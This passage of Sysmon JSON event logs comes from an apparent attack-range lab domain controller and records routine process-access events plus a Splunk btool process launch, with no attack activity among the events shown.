{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1802,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1803,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1804,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1805,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1806,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001016930300}\r\nTargetProcessId: 3784\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001016930300}","TargetProcessId":"3784","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1807,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.894\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-001023940300}\r\nProcessId: 3748\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-106C-5F25-0000-001016930300}\r\nParentProcessId: 3784\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.894","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-001023940300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-106C-5F25-0000-001016930300}","ParentProcessId":"3784","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1808,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-001016930300}\r\nSourceProcessId: 3784\r\nSourceThreadId: 3788\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001023940300}\r\nTargetProcessId: 3748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-001016930300}","SourceProcessId":"3784","SourceThreadId":"3788","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001023940300}","TargetProcessId":"3748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1809,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001023940300}\r\nTargetProcessId: 3748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001023940300}","TargetProcessId":"3748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1810,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1811,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: 